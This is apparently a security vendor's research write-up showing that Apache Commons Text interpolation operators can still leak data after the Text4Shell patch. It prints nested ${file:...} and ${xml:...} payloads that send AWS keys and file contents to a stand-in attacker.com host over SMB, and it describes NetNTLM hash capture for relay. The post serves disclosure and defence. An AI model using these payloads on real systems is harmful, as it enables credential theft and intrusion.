Text4Shell++ - Where There’s Smoke, There’s Fire

(Or at least some ash)

As part of our Attack Surface Management capabilities delivered through the watchTowr Platform, we analyse vulnerabilities in technology that is likely to be prevalent across the attack surfaces of our clients. This enables proactive defense for organisations leveraging the watchTowr Platform, and gives forward visibility of vulnerabilities while we liaise with vendors and projects to have identified vulnerabilities remediated.

In our previous post about the 'Text4Shell' vulnerability (tracked as CVE-2022-42889), we went through the bug itself, and why it was dangerous.

You'll remember the discussion focussed on three interpolation operators - the most dangerous being script, which allowed for the execution of arbitrary JavaScript. Two other interpolation operators, dns and url, allowed us to exfiltrate data - such as environment variables - by embedding this data into requests made to remote servers.

However - being the generally nefarious and curious people that we are - we noticed some further interesting interpolation operators, which had not been patched out and could potentially be abused by an attacker. The documentation in StringSubstitutor.java helpfully lists them:

final String text = interpolator.replace(
  "Base64 Decoder:        ${base64Decoder:SGVsbG9Xb3JsZCE=}\n"
+ "Base64 Encoder:        ${base64Encoder:HelloWorld!}\n"
+ "Java Constant:         ${const:java.awt.event.KeyEvent.VK_ESCAPE}\n"
+ "Date:                  ${date:yyyy-MM-dd}\n"
+ "Environment Variable:  ${env:USERNAME}\n"
+ "File Content:          ${file:UTF-8:src/test/resources/document.properties}\n"
+ "Java:                  ${java:version}\n"
+ "Localhost:             ${localhost:canonical-name}\n"
+ "Properties File:       ${properties:src/test/resources/document.properties::mykey}\n"
+ "Resource Bundle:       ${resourceBundle:org.apache.commons.text.example.testResourceBundleLookup:mykey}\n"
+ "System Property:       ${sys:user.dir}\n"
+ "URL Decoder:           ${urlDecoder:Hello%20World%21}\n"
+ "URL Encoder:           ${urlEncoder:Hello World!}\n"
+ "XML XPath:             ${xml:src/test/resources/document.xml:/root/path/to/node}\n");

Most of these are benign, and of no use to a potential attacker, but our attention was quickly drawn to the file and xml interpolation operators, both of which allow access to an arbitrary file. Other operators, such as env, which allows access to environment variables, also look like they could hold some potential for abuse - but how?

Well, it turns out that they can be useful for transferring data from a victim's server to an attacker's host, and if they can be chained together, they can both retrieve sensitive data, and send it to an attacker.

Exfiltration Of Environment Variables

The best example of an operator that lends itself to abuse is the file operator, which is designed to simply read the contents of a specified file. A remote attacker can use this, specifying a UNC path to a host they control, and embed secret information within the path.

For example, consider the following (benign) interpolation:

final String logmsg = interpolator.replace("The message is: ${file:UTF-8:\\\\attacker.com\\foo\\bar}\n");

This will attempt to retrieve a file from the host at attacker.com from a share named foo. This remote host can run an SMB server, and watch the logs for requests of this file:

# tail /var/log/samba/log.host  
 process_usershare_file: stat of /var/lib/samba/usershares/foo failed. Permission denied
 

If the application running on the target has enabled the option EnableSubstitutionInVariables, then it is straightforward to use this functionality to leak sensitive information. This option enables recursive interpolation, so it is possible to use one interpolation operator to gain access to sensitive information, such as an environment variable, and then use a second interpolation operator to send it to an attacker.

For example, consider a host with a secret stored in an environment variable - let's say AWS_ACCESS_KEY_ID. The env interpolation operator can be used to view this:

final String logmsg = interpolator.replace("The message is: ${env:AWS_ACCESS_KEY_ID}\n"); 

And then the string can be wrapped in a file request, in order to send it to an attacker.

final String logmsg = interpolator.replace("The message is: ${file:\\\\attacker.com\\${env:AWS_ACCESS_KEY_ID}}\n"); 

The env variable will first be expanded, and then the request will be sent to the attacker, who is monitoring requests to their server at attacker.com:

# tail /var/log/samba/log.host  
 process_usershare_file: stat of /var/lib/samba/usershares/akiaiosfodnn7example failed. Permission denied
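The innermost-first expansion order described above can be illustrated with a small, standard-library-only sketch. This is not the Commons Text implementation: the class name, the `lookup` stand-ins, and the fixed example key are all hypothetical, and nothing here touches the network or the real environment. It only shows why the inner `env` expression ends up embedded in the path that the outer `file` expression would open.

```java
class NestedInterpolationSketch {

    // Hypothetical stand-ins for the library's lookups: fixed values, no I/O.
    static String lookup(String prefix, String key) {
        switch (prefix) {
            case "env":
                return key.equals("AWS_ACCESS_KEY_ID") ? "AKIAIOSFODNN7EXAMPLE" : "";
            case "file":
                // The real operator would try to open this path (an SMB request for a UNC path).
                return "<would open " + key + ">";
            default:
                throw new IllegalArgumentException("unknown lookup: " + prefix);
        }
    }

    // Repeatedly resolve the innermost ${prefix:key} expression until none remain.
    static String expand(String text) {
        int end;
        while ((end = text.indexOf('}')) >= 0) {
            int start = text.lastIndexOf("${", end);
            if (start < 0) {
                break; // stray closing brace: stop (toy behaviour)
            }
            String body = text.substring(start + 2, end);
            int colon = body.indexOf(':');
            if (colon < 0) {
                throw new IllegalArgumentException("missing ':' in " + body);
            }
            String value = lookup(body.substring(0, colon), body.substring(colon + 1));
            text = text.substring(0, start) + value + text.substring(end + 1);
        }
        return text;
    }

    public static void main(String[] args) {
        System.out.println(expand("${file:\\\\attacker.com\\${env:AWS_ACCESS_KEY_ID}}"));
    }
}
```

By the time the outer expression is evaluated, the secret is already part of the path, which is all the attacker needs.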
 

For those environment variables that contain special characters, the urlEncoder interpolator comes in handy. For example, AWS_SECRET_KEY often contains slashes, which would otherwise be treated as path separators and break our exfiltration. We can URL-encode them like this:

final String logmsg = interpolator.replace("The message is: ${file:\\\\attacker.com\\${urlEncoder:${env:AWS_SECRET_KEY}}}\n"); 

And simply pluck them from our smbd log.

# tail /var/log/samba/log.host
 process_usershare_file: share name wjalrxutnfemi%2fk7mdeng%2fbpxrficyexamplekey contains invalid characters (any of %<>*?|/\+=;:",)
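To see what the encoding step does to a value containing slashes, here is a minimal sketch using `java.net.URLEncoder` directly. It assumes the urlEncoder operator behaves like this standard-library encoder, and it needs Java 10 or later for the `Charset` overload. The class and method names are hypothetical, and the secret is AWS's documented example key.

```java
import java.net.URLEncoder;
import java.nio.charset.StandardCharsets;

class UrlEncodeSketch {

    // Percent-encode a value so it contains no path separators.
    static String encodeForPath(String secret) {
        return URLEncoder.encode(secret, StandardCharsets.UTF_8);
    }

    public static void main(String[] args) {
        // prints wJalrXUtnFEMI%2FK7MDENG%2FbPxRfiCYEXAMPLEKEY
        System.out.println(encodeForPath("wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY"));
    }
}
```

The encoder itself preserves case, so the lower-casing visible in the log line above presumably happens on the SMB server side rather than in the encoding step.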

This is not the only interpolation operator which fetches a file - the xml operator, designed to load an XML document and perform an xpath query, also exposes this functionality:

final String logmsg = interpolator.replace("The message is: ${xml:\\\\192.168.182.138\\${urlEncoder:${env:AWS_ACCESS_KEY_ID}}:/}\n");

Exfiltrating Arbitrary Files

These two operators, file and xml, are not only useful for exfiltrating environment variables, but also for exposing the contents of files themselves. We can nest two file interpolations - one to retrieve a file from the target system's filesystem, and another to send it to our host.

For example, we'll fetch my .gitconfig file:

final String logmsg = interpolator.replace("The message is: ${file:UTF-8:..\\..\\..\\..\\Users\\aliz\\.gitconfig}\n");

And send it to our attacker host, URL-encoded.

final String logmsg = interpolator.replace("The message is: ${file:\\\\attacker.com\\${urlEncoder:${file:UTF-8:..\\..\\..\\..\\Users\\aliz\\.gitconfig}}}\n");

The result:

# tail /var/log/samba/log.host  
 process_usershare_file: share name %5buser%5d%0a%09email+%3d+aliz%40watchtowr.com%0a%09name+%3d+aliz+hammond%0a%5bcredential+%22http%3a%2f%2fredacted%22%5d%0a%09provider+%3d+bitbucket%0a contains invalid characters (any of %<>*?|/\+=;:",)
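On the attacker's side, recovering the file contents from a logged share name is a single decoding step. The sketch below uses `java.net.URLDecoder` (Java 10 or later for the `Charset` overload) on the first part of the share name shown above. The class and method names are hypothetical.

```java
import java.net.URLDecoder;
import java.nio.charset.StandardCharsets;

class ShareNameDecodeSketch {

    // Reverse the URL-encoding applied by the nested urlEncoder expression.
    static String decode(String shareName) {
        return URLDecoder.decode(shareName, StandardCharsets.UTF_8);
    }

    public static void main(String[] args) {
        // Start of the share name taken from the log line above.
        String logged = "%5buser%5d%0a%09email+%3d+aliz%40watchtowr.com%0a";
        System.out.print(decode(logged));
    }
}
```

The decoded text is the start of the .gitconfig file: a `[user]` section header followed by a tab-indented `email = aliz@watchtowr.com` line.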

Forcing Negotiation - AKA, Give Me Credz

There is another consideration, even when EnableSubstitutionInVariables is not set, and that is the threat posed by the target simply connecting to an attacker-controlled host via SMB.

Those well-versed in lateral movement will be aware that, upon connecting to the attacker-controlled host, the target machine will attempt to negotiate authentication parameters before attempting to fetch any files. As part of this process, hashes of various tokens, including the 'NetNTLMv1' and 'NetNTLMv2' hashes, will be sent to the attacker.

These hashes can then be loaded into a tool such as Impacket and relayed, allowing the attacker to assume the identity - under some circumstances - of the account that first performed the string interpolation.

This is a much more serious attack, and it requires only that an attacker can interpolate a string of their choosing - there is no requirement that they are able to read the interpolated output.
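Since this attack needs nothing more than a file or xml expression containing a UNC path, one rough way to spot attempts in input or logs is a pattern match. The sketch below is a heuristic only, not a complete defence: the class name and regular expression are our own assumptions, it treats any `\\host` or `//host` sequence inside such an expression as suspicious, and it will miss paths that are assembled through nested expansion.

```java
import java.util.regex.Pattern;

class UncLookupDetectorSketch {

    // ${file:...} or ${xml:...} whose body contains \\host or //host.
    // Matched case-insensitively, on the assumption that operator names may be written in any case.
    private static final Pattern UNC_LOOKUP = Pattern.compile(
            "\\$\\{(?:file|xml):[^}]*(?:\\\\\\\\|//)[^\\\\/}]+",
            Pattern.CASE_INSENSITIVE);

    static boolean looksLikeUncLookup(String input) {
        return input != null && UNC_LOOKUP.matcher(input).find();
    }

    public static void main(String[] args) {
        System.out.println(looksLikeUncLookup("${file:UTF-8:\\\\attacker.com\\foo\\bar}"));
        System.out.println(looksLikeUncLookup("${file:UTF-8:src/test/resources/document.properties}"));
    }
}
```

A check like this is better suited to alerting than to blocking, as it can produce false positives on legitimate paths that happen to contain a double slash.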

Other Considerations

There are other, more minor, instances in which these interpolation operators may assist an attacker.

Firstly, since the target machine will perform a DNS lookup before connecting to a UNC share, it may permit an attacker to map internal infrastructure by querying an otherwise-inaccessible DNS server.

Secondly, the ability to retrieve files specified by UNC path is not limited to the targeted host. If the target host has access to resources on other hosts, file interpolations can be chained to retrieve files from these hosts.

Isn't this all by design?

There's certainly an argument to be made that the software is working as intended, and that this behaviour is simply "by design". However, we posit that this is not the case: we believe the functions that expose string interpolation are designed to handle untrusted input (as evidenced by the attention garnered by the original Text4Shell vulnerability, and the subsequent patch).

While useful for programmers, we still believe that this functionality (particularly the ability to specify UNC paths) allows attackers to perform dangerous functions and should be treated as a security vulnerability.

As with all vulnerabilities we discover, we reached out to the vendor (in this case Apache) via their security contact. After some initial confusion, they declined to treat these issues as security-sensitive, explaining that they don't consider these string interpolation functions safe to expose to malicious input, and advising that the responsibility lies with the application to use these functions only after sanitising input.

Update, 9th September: Apache have further clarified their position via email. They advise that operators such as script were disabled not because they view them as a security hole, but rather to reduce the impact of exploitation of application-layer vulnerabilities that call these functions dangerously, as part of a defence-in-depth "harm reduction" approach. They also comment that they attribute the media attention around the original Text4Shell "bugs" to the high CVSS score, which was itself a result of NVD's rule system not accurately expressing the severity of the vulnerability, since the rule system doesn't really handle bugs in libraries very well. They also directed me to their vulnerabilities page, which explains things well:

.. the Apache Commons Text team have decided to update the configuration to be more "secure by default", so that the impact of a failure to validate inputs is mitigated and will not give an attacker access to these interpolators. However, it is still recommended that users treat untrusted input with care.

Remediation

Because of Apache's stance that this behaviour is expected, mitigation is limited to following best practices, such as ensuring outbound packet filtering is configured to limit the potential for data exfiltration. If possible, we also advise that applications are audited for the potentially-hazardous EnableSubstitutionInVariables option, although we note that omitting this option does not completely eliminate exposure.
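Given Apache's advice that applications should sanitise input themselves, one simple application-level measure is to refuse untrusted text that contains an interpolation prefix before it ever reaches the interpolator. The sketch below is an illustration under assumptions, not an official mitigation: the class and method names are hypothetical, and it assumes the default `${` prefix, so an application configured with a custom prefix would need to adapt it.

```java
class InterpolationGuardSketch {

    // Assumes the default "${" variable prefix is in use.
    static boolean containsInterpolation(String untrusted) {
        return untrusted != null && untrusted.contains("${");
    }

    // Returns the input unchanged if it is safe to pass on, otherwise throws.
    static String requireNoInterpolation(String untrusted) {
        if (containsInterpolation(untrusted)) {
            throw new IllegalArgumentException("interpolation expressions are not allowed in this input");
        }
        return untrusted;
    }

    public static void main(String[] args) {
        System.out.println(requireNoInterpolation("a perfectly ordinary message"));
    }
}
```

Rejecting such input outright, rather than trying to strip or escape expressions, avoids having to reason about how nested or partially escaped expressions would be parsed.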

Conclusion

We've seen that, although some dangerous string interpolation operators have been disabled, others still remain.

If attackers can supply text to be interpolated, and you either present the result, or have enabled the EnableSubstitutionInVariables option, attackers would be able to:

  • Read sensitive environment variables,
  • Read files from the filesystem,
  • Read files from other hosts via SMB,
  • Perform DNS lookups to arbitrary hosts.

If attackers are able to supply text to be interpolated, but are not able to see the result, then they are able to:

  • Cause DNS lookups (though not read the result), which may allow them to infer information via timing,
  • Force the target host to negotiate an SMB connection (and thus leak its NetNTLM hashes).

This analysis allowed watchTowr to rapidly and proactively enumerate vulnerable systems across our client base, and to continuously test for the vulnerability - ahead of public release of information for the wider community.

At watchTowr, we believe continuous security testing is the future, enabling the rapid identification of holistic high-impact vulnerabilities that affect your organisation.

If you'd like to learn more about how the watchTowr Platform, our Attack Surface Management and Continuous Automated Red Teaming solution, can support your organisation, please get in touch.